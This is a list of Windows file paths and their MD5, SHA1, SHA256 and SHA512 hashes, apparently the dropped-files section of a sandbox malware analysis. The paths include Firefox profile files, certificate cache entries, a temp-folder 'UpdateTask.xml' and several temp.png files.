C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ifb4waqr.default-release\sessionstore-backups\recovery.jsonlz4

MD5 af385d7a02a404539bb0df66a33469eb
SHA1 3188ae5b6f843cc1ca7de4717d9c77350d815eb1
SHA256 849b2a72ad197acacacdbeac41e7f44784b1b92d2ae9975fc5c27ecd555b69d1
SHA512 d5a758f3ea9206093d610d6453a138e9f22ae5e082947ad72b02727e6b244b162ab976084a1b4c624cee10d5649f3b0a705885f4d955a8f55e3718d47b70c882

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ifb4waqr.default-release\prefs-1.js

MD5 96dbd5dd77e5c35f470e086e3fd6ffc3
SHA1 b26b9e3c2be2211c3f2fa01b59d2730d5306e518
SHA256 bec091a4671c472d23f72427e9a1020adeca393192e4aae2d178e634cf201fb1
SHA512 d13f7523cde1a119f7c186d17b4c39bd41d08c2c20b8688aed6231d99e39a04349ede1e831f03eb77a89fb4b7210ff345036ce8b8141993c36654371c51e2e17

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ifb4waqr.default-release\addonStartup.json.lz4.tmp

MD5 74095e695a94f6279668b239c62c92c1
SHA1 e5143b4386d8ef8f9fde513515a14e5dc51915d0
SHA256 8101150c9fd2fa619f4d3d2993f9cc296b36c4f79c091a659a8debffaefc665e
SHA512 f180143464d43e160c4bbb43af5f97712ab52762dacc3de90762eec2f7948370a5613dfc21c1a8cfff29c296e4d76765ba1062ebc34f628b2055dbcee0f2f2a3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ifb4waqr.default-release\sessionstore.jsonlz4

MD5 b8845853a77404cae07c04bf2c8fda2b
SHA1 14dcb2bcce2060976f74a4df27e595bd10898ee4
SHA256 fde96436a9f5a8ee3b9c86d3ea6fe018510e8ebc8ffb1db45f126e9c7d42019b
SHA512 70cce709d7127f3aca79e0d751bb0d1b15d1bb0d23addfa9f022c41e293c047d9313eb6a02013ded229a2bb3907abc63aa8606e01cfd432e112a5faeccd947e7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1a1ed6657c690809d9a17f5b52d4f94e
SHA1 4783e46ce3d6da82891310d273f49f943f357ef5
SHA256 f48e9248bc6a447afb5571a52f80be8308167ef24a16fb2f42e74e29198f5c30
SHA512 8851f8b2f2f0afa15abfe868349d663f1cc1d634ddbbe300756cc5930008c0b1a8735749fc261611a171ccd73bd08d3d7ac1d73716c148bc551e421369ac17fb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b05016ef3951e2c4297806b8f7ddde0d
SHA1 bc99eaa1d62b1145f3c0372b38bf070b34a3d1b6
SHA256 83996958025c456a2be8418962a4c17f2cc0393dfa75aaa66c59c2e664a475ee
SHA512 2be470e56f43374b95ae310995ddb23099413d207c4098d5fb21779882b96cbf127f56a6a23d5e1a9514d67bf352665bd35ba7431ca33429425abff6cf8c4b65

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a4f3b48c24527280e0b8ad0fe2a39fb3
SHA1 d87884c53b36c06dcf326d66005a58a75d190bfa
SHA256 a3894954e1de2a8bcc3f149c2dc281a9b80f5ca83e0f2fa2277e896be451c9d5
SHA512 7f29815d7d46a312d5eb7aeeddd3b67eaf051d0bd8c4bdc8e419b6dfddc0ca067b5e4ae0b1ca43ba64df9bfbebc0c0d015757d0f03727b58d813cbf4209e622c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 130443a38bf47eb4b03e17d1ff972f37
SHA1 636b454359d2598f6568c8262c5088b11d1b87b1
SHA256 d5f40afeff5c5154e876ce7b8e0193bcd439bf3106f519028473b43452a75d6c
SHA512 566a0fc8e36b2613c766356a51b4b7b6884c4848248a0d1a142a70e37c93e40cc67fda1b1d50380af4b17e7f32dbf9a38067e9f5efe865eede70a2c86cb29e32

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6f057c6b96d77569627b7fe2565a39fe
SHA1 c93e440d4e2b85c24c9b12bf957bbdc5ca2ea9db
SHA256 ca56770e4aa8f8a6a1f6efa6d99dbd7932a6418ea424c8938fc55a939ff207e8
SHA512 629b4cdf089216b2f476c27ed8936ac7fbee71fb0de0c11f54d1fd96271988034aa0f14886c8bc069a31adba4a84cb339eff23191f1cb0b1fb9790af51c3272e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c7ba92e7446724875bab4513cbc2f253
SHA1 ce82cd74b501b0c4079e35766d3671852937f826
SHA256 af51beef8dcee3c81ec9093b356405bca17602adcf060cc784019ba08dbac085
SHA512 08ce9e87795c8be9ceaa640f3ac339301871a7baff2aa2a2c5a296d29e70c3c9dc04cc1706f605a712e78b8077159d5b05bd2609a9b0b503e1aa08a59c529d8b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2c6b9cd7e2447626b98eb54276af707c
SHA1 8b68d61d0ff758afc13bd31c1cf21f22e235dcca
SHA256 a145696fde2b562d7e16dd79fce3f160456d6ef03bb3e76ee72b21a976aa105d
SHA512 ac22bc1891474b10096bea07f941c84902c897ad1885c35b5dbe658a9317cfedcc1b49c9e8923aa647792bc5b09c737b0e3f91eceb4a9f89d25bb67b55a67e86

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2bfcafacec521b455fcb587e1df47220
SHA1 b1a06095f4466e9805f6820d038a7e38e84984e4
SHA256 d63e35bec78b81c055c2e6e0ed66ce54cd3bd3490de3e58a5a036109efe099ad
SHA512 651a9629452cbdb1bd18ac77d2a1925e70e19a885d67678ce275bbd76912088f73ff397d0e5fcf333c70cc13fb081916392a0f80bec98b065b299ba3e9ba1e62

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 09250c1f5b24f786f75c09997d6f0aa2
SHA1 65a9b270dd6bb857bdf6811ef715efa14424199d
SHA256 55d4eff676de33c79fc1c1f6cf203981d51bb69aca1dd3e675e5ce88eee89688
SHA512 4faaa4c227b8a4ceb434941bbb0940cf3a79637d3b47502ed3f96b9d9e5251936bb491fc4c90959ac69bd99d3acb85728abe70606d4672dd63d21de689d8d9c4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cfb9e76bd7d6489c644ac3f6a2eab642
SHA1 07c238ae0c139bdb64d26a44c1346d8dbfc6d69d
SHA256 df196658fd507b9c03aa80efd3bb7d5cc547e78ba3c5afbc03aa486707e34caf
SHA512 83fd7d7f7fd4b544f3b39ee2201ffa7fcf3cc7da3c1299df4697163ac8caf4144565b0f20f15b64b77fe6817ca2f7a18b5d350bdd99689a5b93d33ebc9e7baaa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f820a1202fd1feb9ad2837d36fff7b03
SHA1 b357d2dafdbf4630c48f0652ebc28d9db0740ca3
SHA256 f35d7000f29fcaf245691cb1ab3c6001a910dd9e8340ab999e217f7593abac4a
SHA512 5014fcfa8c725cbd8f8e74d572cc96df0e88c9a1141b3656edcafdd0d6aa7aa1e05b45252adfe796976c1f0fa24c9f19a5994520170acbb2f541a7f1d361c834

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4501edfa31b1f7a1a38e88e877181510
SHA1 7ab91dc5da9922110598d28c443530e5ab8abd6f
SHA256 64ef7a5af7e4eaa7f78c20acf133bb5c3cf6323b256e13f7ba253bb200a7f403
SHA512 abeb614e13d16b88ed78cc5b614a4299f14be7ad6ab15a447695c41fc28d14ac36d7d764f828575375202b129b8e053f40239b8001314ec5a191e2955586cdea

C:\Users\Admin\AppData\Local\Temp\ytmp\UpdateTask.xml

MD5 b6a472e1f21ebbb3cbec6fcd07974c8d
SHA1 193343a18e07a84086cc4cadde32e5f7c522225f
SHA256 bb64de0aa3da95a3ace822c245b301806fbca035788b9ec44150cecf95b38afc
SHA512 d10cf5a9cfdb3f27da4ba55de7b665bc52e46c647156bf43ef6b4701c233951ba89d96f57cff1c4b0d2240c5c3c506c1d86a6484a63f81feeae800ea2cb6778f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VI73H8CTRQTW5I60I9LQ.temp

MD5 1b01d33bde5320e5d3955c26d1ed9244
SHA1 8f49ca9d51813fd2cb2fa47b3f9e6807befda5d0
SHA256 6a277ca6e3ce61cb32b27517ea539897a8faa1c40434c5fba3443e60033c3c8b
SHA512 e824423d3e4e052290d4afeb545df2c80c31d630b46768c783e93b7c6b339781b5b8813d1fd2b1f0355606118e2c2bf65075d3c5cd680ac36bed86677de1631b

C:\Users\Admin\AppData\Roaming\IDM\DwnlData\Admin\1713061820f1_0\log_0.log

MD5 fbe1f28c223dfc943cb113f4f8ac32c7
SHA1 842ef45244dded24b35632513cf52dd5680ce2ea
SHA256 d209db2fcf7918a734aa8a7be1726d952f6d893946b5c7f7ce5b1fa879cf7d05
SHA512 b080f3ce344c96fdf82e7d4c2d13203005dd69c33ac3e082bbae8e074776e0133d9dd68ae067ff489f107a6a92987610b9aa964c30511f8df067b8f567c6d7d7

C:\Users\Admin\AppData\Roaming\IDM\DwnlData\Admin\1713061821f2_0\log_0.log

MD5 c2e577c191cc5e6ae073c75151cb7481
SHA1 796fb76acbae2c3faa3b21455d67aeda54fa7285
SHA256 df0fd9a074fe793e20ea1c2176eab7ae024ea30e7614685c112c54fb50beacbe
SHA512 ec37622b07426ebe5b7c35433e8afab4d5b8e33910fddceb7bd1c094a8365f8892316028aadaea510e3c422ae3cb6959773d6f6495e9ca888eaf06594f42887c

C:\Windows\Temp\temp.png

MD5 076ab35d6cd3a9bbc418cf0bdb77cf8d
SHA1 c8d4cdf2a796b47edc1fbe2d871973968b28e9cd
SHA256 8f3dc3389af46078d30556cf56e9d2a621f78dad02e00c398c3d2d5d63ec64e6
SHA512 d3c7dd84f8d4c2f34162359ed7eca591262ab9f3bd10a420223fd00862e5d98b6b2bf1f1017d605dd2e7cef1c77bf4c6b97f59a782a51f37eeca7517c76b78f6

C:\Users\Admin\AppData\Roaming\IDM\DwnlData\Admin\1713061821f2_0\1713061821f2

MD5 06debf4b3feae84edf7ece5573073a08
SHA1 38a31ec3678f4b31e899b0cbde38d091a76c1288
SHA256 5bc35c20d5476eea550e34045228580d5d08d6c899cf41750800bec3ebba54e0
SHA512 e0e204e2650e156f9a9f94a4b0837a16585d9e0340556521fa1a968128b34f77a89ecda2a292cbe7a9c8cebe57efd9f699868c344ebf281198895c76c4f05ba8

C:\Windows\Temp\temp.png

MD5 9b35f9d2bdbd5129eb5fc172a7745b7e
SHA1 52a5063246e45f24877afabbf45714bf04b49ed8
SHA256 fefe2e856f60023fa08d628749fdb8904e0bd70da486c98c3bd5ad17a05dc11f
SHA512 5bc64993b0e1986017fc7d2265b1ff336bfe6dc05c7bb874416709d02b55926df4887adfe63b6a7adbf51b2ff3ad8da59377962dd0085cee33546f086ea8769e

C:\Windows\Temp\temp.png

MD5 54f32b87ac5e767c6b602d94eef62aac
SHA1 5755c555e649e165b8ab1950ab9ba61d6be763f9
SHA256 e982e986e8c5d6f9d60d1f695e2db72bfca51c5be935e83b40320379b0701f16
SHA512 5f4e094ac17ca6ee31055bb30517178fa24c7828f7bce937a874bbfb5d2dbcd3b9e22a81f9f4f2cb9bc78dcad4be27b39512effc263ea4232f73f1dc086fcca5

C:\Users\Admin\AppData\Local\Temp\REG4902.tmp

MD5 27566d210fbde8743dde0a8df9964a5b
SHA1 81b82cd6c41f171db81d4d724890b05a31fa8ca3
SHA256 ac0154b9ce14eafcfad2c0a68a304243d62160585083f1b2c45f6063964243ab
SHA512 ac4d4bfbb4e41690ce249b8cbb71a5e983585da73b4f66012d121e2ffa3feb428acd2cd5a24626eb4831d260ac589b5f1e2f56f68238416339a291778d03defa